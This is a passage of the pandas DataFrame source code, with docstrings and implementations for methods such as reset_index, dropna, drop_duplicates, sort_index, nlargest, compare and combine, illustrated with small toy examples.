col_fill : object, default ''
If the columns have multiple levels, determines how the other
levels are named. If None then the index name is repeated.
Returns
-------
DataFrame or None
DataFrame with the new index or None if ``inplace=True``.
See Also
--------
DataFrame.set_index : Opposite of reset_index.
DataFrame.reindex : Change to new indices or expand indices.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
>>> df = pd.DataFrame([('bird', 389.0),
... ('bird', 24.0),
... ('mammal', 80.5),
... ('mammal', np.nan)],
... index=['falcon', 'parrot', 'lion', 'monkey'],
... columns=('class', 'max_speed'))
>>> df
class max_speed
falcon bird 389.0
parrot bird 24.0
lion mammal 80.5
monkey mammal NaN
When we reset the index, the old index is added as a column, and a
new sequential index is used:
>>> df.reset_index()
index class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
We can use the `drop` parameter to avoid the old index being added as
a column:
>>> df.reset_index(drop=True)
class max_speed
0 bird 389.0
1 bird 24.0
2 mammal 80.5
3 mammal NaN
You can also use `reset_index` with `MultiIndex`.
>>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
... ('bird', 'parrot'),
... ('mammal', 'lion'),
... ('mammal', 'monkey')],
... names=['class', 'name'])
>>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
... ('species', 'type')])
>>> df = pd.DataFrame([(389.0, 'fly'),
... ( 24.0, 'fly'),
... ( 80.5, 'run'),
... (np.nan, 'jump')],
... index=index,
... columns=columns)
>>> df
speed species
max type
class name
bird falcon 389.0 fly
parrot 24.0 fly
mammal lion 80.5 run
monkey NaN jump
If the index has multiple levels, we can reset a subset of them:
>>> df.reset_index(level='class')
class speed species
max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we are not dropping the index, by default, it is placed in the top
level. We can place it in another level:
>>> df.reset_index(level='class', col_level=1)
speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
When the index is inserted under another level, we can specify under
which one with the parameter `col_fill`:
>>> df.reset_index(level='class', col_level=1, col_fill='species')
species speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we specify a nonexistent level for `col_fill`, it is created:
>>> df.reset_index(level='class', col_level=1, col_fill='genus')
genus speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
"""
inplace = validate_bool_kwarg(inplace, "inplace")
self._check_inplace_and_allows_duplicate_labels(inplace)
if inplace:
new_obj = self
else:
new_obj = self.copy()
new_index = ibase.default_index(len(new_obj))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if not drop:
to_insert: Iterable[Tuple[Any, Optional[Any]]]
if isinstance(self.index, MultiIndex):
names = [
(n if n is not None else f"level_{i}")
for i, n in enumerate(self.index.names)
]
to_insert = zip(self.index.levels, self.index.codes)
else:
default = "index" if "index" not in self else "level_0"
names = [default] if self.index.name is None else [self.index.name]
to_insert = ((self.index, None),)
multi_col = isinstance(self.columns, MultiIndex)
for i, (lev, lab) in reversed(list(enumerate(to_insert))):
if not (level is None or i in level):
continue
name = names[i]
if multi_col:
col_name = list(name) if isinstance(name, tuple) else [name]
if col_fill is None:
if len(col_name) not in (1, self.columns.nlevels):
raise ValueError(
"col_fill=None is incompatible "
f"with incomplete column name {name}"
)
col_fill = col_name[0]
lev_num = self.columns._get_level_number(col_level)
name_lst = [col_fill] * lev_num + col_name
missing = self.columns.nlevels - len(name_lst)
name_lst += [col_fill] * missing
name = tuple(name_lst)
# to ndarray and maybe infer different dtype
level_values = maybe_casted_values(lev, lab)
new_obj.insert(0, name, level_values)
new_obj.index = new_index
if not inplace:
return new_obj
return None
# ----------------------------------------------------------------------
# Reindex-based selection methods
@doc(NDFrame.isna, klass=_shared_doc_kwargs["klass"])
def isna(self) -> DataFrame:
result = self._constructor(self._mgr.isna(func=isna))
return result.__finalize__(self, method="isna")
@doc(NDFrame.isna, klass=_shared_doc_kwargs["klass"])
def isnull(self) -> DataFrame:
return self.isna()
@doc(NDFrame.notna, klass=_shared_doc_kwargs["klass"])
def notna(self) -> DataFrame:
return ~self.isna()
@doc(NDFrame.notna, klass=_shared_doc_kwargs["klass"])
def notnull(self) -> DataFrame:
return ~self.isna()
def dropna(self, axis=0, how="any", thresh=None, subset=None, inplace=False):
"""
Remove missing values.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine if rows or columns which contain missing values are
removed.
* 0, or 'index' : Drop rows which contain missing values.
* 1, or 'columns' : Drop columns which contain missing value.
.. versionchanged:: 1.0.0
Pass tuple or list to drop on multiple axes.
Only a single axis is allowed.
how : {'any', 'all'}, default 'any'
Determine if row or column is removed from DataFrame, when we have
at least one NA or all NA.
* 'any' : If any NA values are present, drop that row or column.
* 'all' : If all values are NA, drop that row or column.
thresh : int, optional
Require that many non-NA values.
subset : array-like, optional
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
DataFrame or None
DataFrame with NA entries dropped from it or None if ``inplace=True``.
See Also
--------
DataFrame.isna: Indicate missing values.
DataFrame.notna : Indicate existing (non-missing) values.
DataFrame.fillna : Replace missing values.
Series.dropna : Drop missing values.
Index.dropna : Drop missing indices.
Examples
--------
>>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
... "toy": [np.nan, 'Batmobile', 'Bullwhip'],
... "born": [pd.NaT, pd.Timestamp("1940-04-25"),
... pd.NaT]})
>>> df
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Drop the rows where at least one element is missing.
>>> df.dropna()
name toy born
1 Batman Batmobile 1940-04-25
Drop the columns where at least one element is missing.
>>> df.dropna(axis='columns')
name
0 Alfred
1 Batman
2 Catwoman
Drop the rows where all elements are missing.
>>> df.dropna(how='all')
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep only the rows with at least 2 non-NA values.
>>> df.dropna(thresh=2)
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Define in which columns to look for missing values.
>>> df.dropna(subset=['name', 'toy'])
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep the DataFrame with valid entries in the same variable.
>>> df.dropna(inplace=True)
>>> df
name toy born
1 Batman Batmobile 1940-04-25
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if isinstance(axis, (tuple, list)):
# GH20987
raise TypeError("supplying multiple axes to axis is no longer supported.")
axis = self._get_axis_number(axis)
agg_axis = 1 - axis
agg_obj = self
if subset is not None:
ax = self._get_axis(agg_axis)
indices = ax.get_indexer_for(subset)
check = indices == -1
if check.any():
raise KeyError(list(np.compress(check, subset)))
agg_obj = self.take(indices, axis=agg_axis)
count = agg_obj.count(axis=agg_axis)
if thresh is not None:
mask = count >= thresh
elif how == "any":
mask = count == len(agg_obj._get_axis(agg_axis))
elif how == "all":
mask = count > 0
else:
if how is not None:
raise ValueError(f"invalid how option: {how}")
else:
raise TypeError("must specify how or thresh")
result = self.loc(axis=axis)[mask]
if inplace:
self._update_inplace(result)
else:
return result
def drop_duplicates(
self,
subset: Optional[Union[Hashable, Sequence[Hashable]]] = None,
keep: Union[str, bool] = "first",
inplace: bool = False,
ignore_index: bool = False,
) -> Optional[DataFrame]:
"""
Return DataFrame with duplicate rows removed.
Considering certain columns is optional. Indexes, including time indexes
are ignored.
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns.
keep : {'first', 'last', False}, default 'first'
Determines which duplicates (if any) to keep.
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : bool, default False
Whether to drop duplicates in place or to return a copy.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
Returns
-------
DataFrame or None
DataFrame with duplicates removed or None if ``inplace=True``.
See Also
--------
DataFrame.value_counts: Count unique combinations of columns.
Examples
--------
Consider dataset containing ramen rating.
>>> df = pd.DataFrame({
... 'brand': ['Yum Yum', 'Yum Yum', 'Indomie', 'Indomie', 'Indomie'],
... 'style': ['cup', 'cup', 'cup', 'pack', 'pack'],
... 'rating': [4, 4, 3.5, 15, 5]
... })
>>> df
brand style rating
0 Yum Yum cup 4.0
1 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
By default, it removes duplicate rows based on all columns.
>>> df.drop_duplicates()
brand style rating
0 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
To remove duplicates on specific column(s), use ``subset``.
>>> df.drop_duplicates(subset=['brand'])
brand style rating
0 Yum Yum cup 4.0
2 Indomie cup 3.5
To remove duplicates and keep last occurrences, use ``keep``.
>>> df.drop_duplicates(subset=['brand', 'style'], keep='last')
brand style rating
1 Yum Yum cup 4.0
2 Indomie cup 3.5
4 Indomie pack 5.0
"""
if self.empty:
return self.copy()
inplace = validate_bool_kwarg(inplace, "inplace")
duplicated = self.duplicated(subset, keep=keep)
result = self[-duplicated]
if ignore_index:
result.index = ibase.default_index(len(result))
if inplace:
self._update_inplace(result)
return None
else:
return result
def duplicated(
self,
subset: Optional[Union[Hashable, Sequence[Hashable]]] = None,
keep: Union[str, bool] = "first",
) -> Series:
"""
Return boolean Series denoting duplicate rows.
Considering certain columns is optional.
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns.
keep : {'first', 'last', False}, default 'first'
Determines which duplicates (if any) to mark.
- ``first`` : Mark duplicates as ``True`` except for the first occurrence.
- ``last`` : Mark duplicates as ``True`` except for the last occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
Series
Boolean series for each duplicated rows.
See Also
--------
Index.duplicated : Equivalent method on index.
Series.duplicated : Equivalent method on Series.
Series.drop_duplicates : Remove duplicate values from Series.
DataFrame.drop_duplicates : Remove duplicate values from DataFrame.
Examples
--------
Consider dataset containing ramen rating.
>>> df = pd.DataFrame({
... 'brand': ['Yum Yum', 'Yum Yum', 'Indomie', 'Indomie', 'Indomie'],
... 'style': ['cup', 'cup', 'cup', 'pack', 'pack'],
... 'rating': [4, 4, 3.5, 15, 5]
... })
>>> df
brand style rating
0 Yum Yum cup 4.0
1 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
By default, for each set of duplicated values, the first occurrence
is set on False and all others on True.
>>> df.duplicated()
0 False
1 True
2 False
3 False
4 False
dtype: bool
By using 'last', the last occurrence of each set of duplicated values
is set on False and all others on True.
>>> df.duplicated(keep='last')
0 True
1 False
2 False
3 False
4 False
dtype: bool
By setting ``keep`` on False, all duplicates are True.
>>> df.duplicated(keep=False)
0 True
1 True
2 False
3 False
4 False
dtype: bool
To find duplicates on specific column(s), use ``subset``.
>>> df.duplicated(subset=['brand'])
0 False
1 True
2 False
3 True
4 True
dtype: bool
"""
from pandas._libs.hashtable import SIZE_HINT_LIMIT, duplicated_int64
from pandas.core.sorting import get_group_index
if self.empty:
return self._constructor_sliced(dtype=bool)
def f(vals):
labels, shape = algorithms.factorize(
vals, size_hint=min(len(self), SIZE_HINT_LIMIT)
)
return labels.astype("i8", copy=False), len(shape)
if subset is None:
subset = self.columns
elif (
not np.iterable(subset)
or isinstance(subset, str)
or isinstance(subset, tuple)
and subset in self.columns
):
subset = (subset,)
# needed for mypy since can't narrow types using np.iterable
subset = cast(Iterable, subset)
# Verify all columns in subset exist in the queried dataframe
# Otherwise, raise a KeyError, same as if you try to __getitem__ with a
# key that doesn't exist.
diff = Index(subset).difference(self.columns)
if not diff.empty:
raise KeyError(diff)
vals = (col.values for name, col in self.items() if name in subset)
labels, shape = map(list, zip(*map(f, vals)))
ids = get_group_index(labels, shape, sort=False, xnull=False)
return self._constructor_sliced(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
# TODO: Just move the sort_values doc here.
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.sort_values.__doc__)
# error: Signature of "sort_values" incompatible with supertype "NDFrame"
def sort_values( # type: ignore[override]
self,
by,
axis=0,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
ignore_index=False,
key: ValueKeyFunc = None,
):
inplace = validate_bool_kwarg(inplace, "inplace")
axis = self._get_axis_number(axis)
if not isinstance(by, list):
by = [by]
if is_sequence(ascending) and len(by) != len(ascending):
raise ValueError(
f"Length of ascending ({len(ascending)}) != length of by ({len(by)})"
)
if len(by) > 1:
from pandas.core.sorting import lexsort_indexer
keys = [self._get_label_or_level_values(x, axis=axis) for x in by]
# need to rewrap columns in Series to apply key function
if key is not None:
keys = [Series(k, name=name) for (k, name) in zip(keys, by)]
indexer = lexsort_indexer(
keys, orders=ascending, na_position=na_position, key=key
)
indexer = ensure_platform_int(indexer)
else:
from pandas.core.sorting import nargsort
by = by[0]
k = self._get_label_or_level_values(by, axis=axis)
# need to rewrap column in Series to apply key function
if key is not None:
k = Series(k, name=by)
if isinstance(ascending, (tuple, list)):
ascending = ascending[0]
indexer = nargsort(
k, kind=kind, ascending=ascending, na_position=na_position, key=key
)
new_data = self._mgr.take(
indexer, axis=self._get_block_manager_axis(axis), verify=False
)
if ignore_index:
new_data.axes[1] = ibase.default_index(len(indexer))
result = self._constructor(new_data)
if inplace:
return self._update_inplace(result)
else:
return result.__finalize__(self, method="sort_values")
def sort_index(
self,
axis=0,
level=None,
ascending: bool = True,
inplace: bool = False,
kind: str = "quicksort",
na_position: str = "last",
sort_remaining: bool = True,
ignore_index: bool = False,
key: IndexKeyFunc = None,
):
"""
Sort object by labels (along an axis).
Returns a new DataFrame sorted by label if `inplace` argument is
``False``, otherwise updates the original DataFrame and returns None.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis along which to sort. The value 0 identifies the rows,
and 1 identifies the columns.
level : int or level name or list of ints or list of level names
If not None, sort on values in specified index level(s).
ascending : bool or list of bools, default True
Sort ascending vs. descending. When the index is a MultiIndex the
sort direction can be controlled for each level individually.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also ndarray.np.sort for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
Puts NaNs at the beginning if `first`; `last` puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
If True and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
key : callable, optional
If not None, apply the key function to the index values
before sorting. This is similar to the `key` argument in the
builtin :meth:`sorted` function, with the notable difference that
this `key` function should be *vectorized*. It should expect an
``Index`` and return an ``Index`` of the same shape. For MultiIndex
inputs, the key is applied *per level*.
.. versionadded:: 1.1.0
Returns
-------
DataFrame or None
The original DataFrame sorted by the labels or None if ``inplace=True``.
See Also
--------
Series.sort_index : Sort Series by the index.
DataFrame.sort_values : Sort DataFrame by the value.
Series.sort_values : Sort Series by the value.
Examples
--------
>>> df = pd.DataFrame([1, 2, 3, 4, 5], index=[100, 29, 234, 1, 150],
... columns=['A'])
>>> df.sort_index()
A
1 4
29 2
100 1
150 5
234 3
By default, it sorts in ascending order, to sort in descending order,
use ``ascending=False``
>>> df.sort_index(ascending=False)
A
234 3
150 5
100 1
29 2
1 4
A key function can be specified which is applied to the index before
sorting. For a ``MultiIndex`` this is applied to each level separately.
>>> df = pd.DataFrame({"a": [1, 2, 3, 4]}, index=['A', 'b', 'C', 'd'])
>>> df.sort_index(key=lambda x: x.str.lower())
a
A 1
b 2
C 3
d 4
"""
return super().sort_index(
axis,
level,
ascending,
inplace,
kind,
na_position,
sort_remaining,
ignore_index,
key,
)
def value_counts(
self,
subset: Optional[Sequence[Label]] = None,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
):
"""
Return a Series containing counts of unique rows in the DataFrame.
.. versionadded:: 1.1.0
Parameters
----------
subset : list-like, optional
Columns to use when counting unique combinations.
normalize : bool, default False
Return proportions rather than frequencies.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
Returns
-------
Series
See Also
--------
Series.value_counts: Equivalent method on Series.
Notes
-----
The returned Series will have a MultiIndex with one level per input
column. By default, rows that contain any NA values are omitted from
the result. By default, the resulting Series will be in descending
order so that the first element is the most frequently-occurring row.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4, 4, 6],
... 'num_wings': [2, 0, 0, 0]},
... index=['falcon', 'dog', 'cat', 'ant'])
>>> df
num_legs num_wings
falcon 2 2
dog 4 0
cat 4 0
ant 6 0
>>> df.value_counts()
num_legs num_wings
4 0 2
6 0 1
2 2 1
dtype: int64
>>> df.value_counts(sort=False)
num_legs num_wings
2 2 1
4 0 2
6 0 1
dtype: int64
>>> df.value_counts(ascending=True)
num_legs num_wings
2 2 1
6 0 1
4 0 2
dtype: int64
>>> df.value_counts(normalize=True)
num_legs num_wings
4 0 0.50
6 0 0.25
2 2 0.25
dtype: float64
"""
if subset is None:
subset = self.columns.tolist()
counts = self.groupby(subset).grouper.size()
if sort:
counts = counts.sort_values(ascending=ascending)
if normalize:
counts /= counts.sum()
# Force MultiIndex for single column
if len(subset) == 1:
counts.index = MultiIndex.from_arrays(
[counts.index], names=[counts.index.name]
)
return counts
def nlargest(self, n, columns, keep="first") -> DataFrame:
"""
Return the first `n` rows ordered by `columns` in descending order.
Return the first `n` rows with the largest values in `columns`, in
descending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=False).head(n)``, but more
performant.
Parameters
----------
n : int
Number of rows to return.
columns : label or list of labels
Column label(s) to order by.
keep : {'first', 'last', 'all'}, default 'first'
Where there are duplicate values:
- `first` : prioritize the first occurrence(s)
- `last` : prioritize the last occurrence(s)
- ``all`` : do not drop any duplicates, even it means
selecting more than `n` items.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
The first `n` rows ordered by the given columns in descending
order.
See Also
--------
DataFrame.nsmallest : Return the first `n` rows ordered by `columns` in
ascending order.
DataFrame.sort_values : Sort DataFrame by the values.
DataFrame.head : Return the first `n` rows without re-ordering.
Notes
-----
This function cannot be used with all column types. For example, when
specifying columns with `object` or `category` dtypes, ``TypeError`` is
raised.
Examples
--------
>>> df = pd.DataFrame({'population': [59000000, 65000000, 434000,
... 434000, 434000, 337000, 11300,
... 11300, 11300],
... 'GDP': [1937894, 2583560 , 12011, 4520, 12128,
... 17036, 182, 38, 311],
... 'alpha-2': ["IT", "FR", "MT", "MV", "BN",
... "IS", "NR", "TV", "AI"]},
... index=["Italy", "France", "Malta",
... "Maldives", "Brunei", "Iceland",
... "Nauru", "Tuvalu", "Anguilla"])
>>> df
population GDP alpha-2
Italy 59000000 1937894 IT
France 65000000 2583560 FR
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
Iceland 337000 17036 IS
Nauru 11300 182 NR
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
In the following example, we will use ``nlargest`` to select the three
rows having the largest values in column "population".
>>> df.nlargest(3, 'population')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Malta 434000 12011 MT
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nlargest(3, 'population', keep='last')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Brunei 434000 12128 BN
When using ``keep='all'``, all duplicate items are maintained:
>>> df.nlargest(3, 'population', keep='all')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
To order by the largest values in column "population" and then "GDP",
we can specify multiple columns like in the next example.
>>> df.nlargest(3, ['population', 'GDP'])
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Brunei 434000 12128 BN
"""
return algorithms.SelectNFrame(self, n=n, keep=keep, columns=columns).nlargest()
def nsmallest(self, n, columns, keep="first") -> DataFrame:
"""
Return the first `n` rows ordered by `columns` in ascending order.
Return the first `n` rows with the smallest values in `columns`, in
ascending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=True).head(n)``, but more
performant.
Parameters
----------
n : int
Number of items to retrieve.
columns : list or str
Column name or names to order by.
keep : {'first', 'last', 'all'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
- ``all`` : do not drop any duplicates, even it means
selecting more than `n` items.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
See Also
--------
DataFrame.nlargest : Return the first `n` rows ordered by `columns` in
descending order.
DataFrame.sort_values : Sort DataFrame by the values.
DataFrame.head : Return the first `n` rows without re-ordering.
Examples
--------
>>> df = pd.DataFrame({'population': [59000000, 65000000, 434000,
... 434000, 434000, 337000, 337000,
... 11300, 11300],
... 'GDP': [1937894, 2583560 , 12011, 4520, 12128,
... 17036, 182, 38, 311],
... 'alpha-2': ["IT", "FR", "MT", "MV", "BN",
... "IS", "NR", "TV", "AI"]},
... index=["Italy", "France", "Malta",
... "Maldives", "Brunei", "Iceland",
... "Nauru", "Tuvalu", "Anguilla"])
>>> df
population GDP alpha-2
Italy 59000000 1937894 IT
France 65000000 2583560 FR
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
Iceland 337000 17036 IS
Nauru 337000 182 NR
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
In the following example, we will use ``nsmallest`` to select the
three rows having the smallest values in column "population".
>>> df.nsmallest(3, 'population')
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Iceland 337000 17036 IS
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nsmallest(3, 'population', keep='last')
population GDP alpha-2
Anguilla 11300 311 AI
Tuvalu 11300 38 TV
Nauru 337000 182 NR
When using ``keep='all'``, all duplicate items are maintained:
>>> df.nsmallest(3, 'population', keep='all')
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Iceland 337000 17036 IS
Nauru 337000 182 NR
To order by the smallest values in column "population" and then "GDP", we can
specify multiple columns like in the next example.
>>> df.nsmallest(3, ['population', 'GDP'])
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Nauru 337000 182 NR
"""
return algorithms.SelectNFrame(
self, n=n, keep=keep, columns=columns
).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0) -> DataFrame:
"""
Swap levels i and j in a MultiIndex on a particular axis.
Parameters
----------
i, j : int or str
Levels of the indices to be swapped. Can pass level name as string.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to swap levels on. 0 or 'index' for row-wise, 1 or
'columns' for column-wise.
Returns
-------
DataFrame
"""
result = self.copy()
axis = self._get_axis_number(axis)
if not isinstance(result._get_axis(axis), MultiIndex): # pragma: no cover
raise TypeError("Can only swap levels on a hierarchical axis.")
if axis == 0:
assert isinstance(result.index, MultiIndex)
result.index = result.index.swaplevel(i, j)
else:
assert isinstance(result.columns, MultiIndex)
result.columns = result.columns.swaplevel(i, j)
return result
def reorder_levels(self, order, axis=0) -> DataFrame:
"""
Rearrange index levels using input order. May not drop or duplicate levels.
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : {0 or 'index', 1 or 'columns'}, default 0
Where to reorder levels.
Returns
-------
DataFrame
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis), MultiIndex): # pragma: no cover
raise TypeError("Can only reorder levels on a hierarchical axis.")
result = self.copy()
if axis == 0:
assert isinstance(result.index, MultiIndex)
result.index = result.index.reorder_levels(order)
else:
assert isinstance(result.columns, MultiIndex)
result.columns = result.columns.reorder_levels(order)
return result
# ----------------------------------------------------------------------
# Arithmetic / combination related
def _combine_frame(self, other: DataFrame, func, fill_value=None):
# at this point we have `self._indexed_same(other)`
if fill_value is None:
# since _arith_op may be called in a loop, avoid function call
# overhead if possible by doing this check once
_arith_op = func
else:
def _arith_op(left, right):
# for the mixed_type case where we iterate over columns,
# _arith_op(left, right) is equivalent to
# left._binop(right, func, fill_value=fill_value)
left, right = ops.fill_binop(left, right, fill_value)
return func(left, right)
new_data = ops.dispatch_to_series(self, other, _arith_op)
return new_data
def _construct_result(self, result) -> DataFrame:
"""
Wrap the result of an arithmetic, comparison, or logical operation.
Parameters
----------
result : DataFrame
Returns
-------
DataFrame
"""
out = self._constructor(result, copy=False)
# Pin columns instead of passing to constructor for compat with
# non-unique columns case
out.columns = self.columns
out.index = self.index
return out
@Appender(
"""
Returns
-------
DataFrame
DataFrame that shows the differences stacked side by side.
The resulting index will be a MultiIndex with 'self' and 'other'
stacked alternately at the inner level.
Raises
------
ValueError
When the two DataFrames don't have identical labels or shape.
See Also
--------
Series.compare : Compare with another Series and show differences.
DataFrame.equals : Test whether two objects contain the same elements.
Notes
-----
Matching NaNs will not appear as a difference.
Can only compare identically-labeled
(i.e. same shape, identical row and column labels) DataFrames
Examples
--------
>>> df = pd.DataFrame(
... {
... "col1": ["a", "a", "b", "b", "a"],
... "col2": [1.0, 2.0, 3.0, np.nan, 5.0],
... "col3": [1.0, 2.0, 3.0, 4.0, 5.0]
... },
... columns=["col1", "col2", "col3"],
... )
>>> df
col1 col2 col3
0 a 1.0 1.0
1 a 2.0 2.0
2 b 3.0 3.0
3 b NaN 4.0
4 a 5.0 5.0
>>> df2 = df.copy()
>>> df2.loc[0, 'col1'] = 'c'
>>> df2.loc[2, 'col3'] = 4.0
>>> df2
col1 col2 col3
0 c 1.0 1.0
1 a 2.0 2.0
2 b 3.0 4.0
3 b NaN 4.0
4 a 5.0 5.0
Align the differences on columns
>>> df.compare(df2)
col1 col3
self other self other
0 a c NaN NaN
2 NaN NaN 3.0 4.0
Stack the differences on rows
>>> df.compare(df2, align_axis=0)
col1 col3
0 self a NaN
other c NaN
2 self NaN 3.0
other NaN 4.0
Keep the equal values
>>> df.compare(df2, keep_equal=True)
col1 col3
self other self other
0 a c 1.0 1.0
2 b b 3.0 4.0
Keep all original rows and columns
>>> df.compare(df2, keep_shape=True)
col1 col2 col3
self other self other self other
0 a c NaN NaN NaN NaN
1 NaN NaN NaN NaN NaN NaN
2 NaN NaN NaN NaN 3.0 4.0
3 NaN NaN NaN NaN NaN NaN
4 NaN NaN NaN NaN NaN NaN
Keep all original rows and columns and also all original values
>>> df.compare(df2, keep_shape=True, keep_equal=True)
col1 col2 col3
self other self other self other
0 a c 1.0 1.0 1.0 1.0
1 a a 2.0 2.0 2.0 2.0
2 b b 3.0 3.0 3.0 4.0
3 b b NaN NaN 4.0 4.0
4 a a 5.0 5.0 5.0 5.0
"""
)
@Appender(_shared_docs["compare"] % _shared_doc_kwargs)
def compare(
self,
other: DataFrame,
align_axis: Axis = 1,
keep_shape: bool = False,
keep_equal: bool = False,
) -> DataFrame:
return super().compare(
other=other,
align_axis=align_axis,
keep_shape=keep_shape,
keep_equal=keep_equal,
)
def combine(
self, other: DataFrame, func, fill_value=None, overwrite=True
) -> DataFrame:
"""
Perform column-wise combine with another DataFrame.
Combines a DataFrame with `other` DataFrame using `func`
to element-wise combine columns. The row and column indexes of the
resulting DataFrame will be the union of the two.
Parameters
----------
other : DataFrame
The DataFrame to merge column-wise.
func : function
Function that takes two series as inputs and return a Series or a
scalar. Used to merge the two dataframes column by columns.
fill_value : scalar value, default None
The value to fill NaNs with prior to passing any column to the
merge func.
overwrite : bool, default True
If True, columns in `self` that do not exist in `other` will be
overwritten with NaNs.
Returns
-------
DataFrame
Combination of the provided DataFrames.
See Also
--------
DataFrame.combine_first : Combine two DataFrame objects and default to
non-null values in frame calling the method.
Examples
--------
Combine using a simple function that chooses the smaller column.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> take_smaller = lambda s1, s2: s1 if s1.sum() < s2.sum() else s2
>>> df1.combine(df2, take_smaller)
A B
0 0 3
1 0 3
Example using a true element-wise combine function.
>>> df1 = pd.DataFrame({'A': [5, 0], 'B': [2, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, np.minimum)
A B
0 1 2
1 0 3
Using `fill_value` fills Nones prior to passing the column to the
merge function.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [3, 3]})
>>> df1.combine(df2, take_smaller, fill_value=-5)
A B
0 0 -5.0
1 0 4.0
However, if the same element in both dataframes is None, that None
is preserved
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [None, 4]})
>>> df2 = pd.DataFrame({'A': [1, 1], 'B': [None, 3]})
>>> df1.combine(df2, take_smaller, fill_value=-5)
A B
0 0 -5.0
1 0 3.0
Example that demonstrates the use of `overwrite` and behavior when
the axis differ between the dataframes.
>>> df1 = pd.DataFrame({'A': [0, 0], 'B': [4, 4]})
>>> df2 = pd.DataFrame({'B': [3, 3], 'C': [-10, 1], }, index=[1, 2])
>>> df1.combine(df2, take_smaller)
A B C
0 NaN NaN NaN
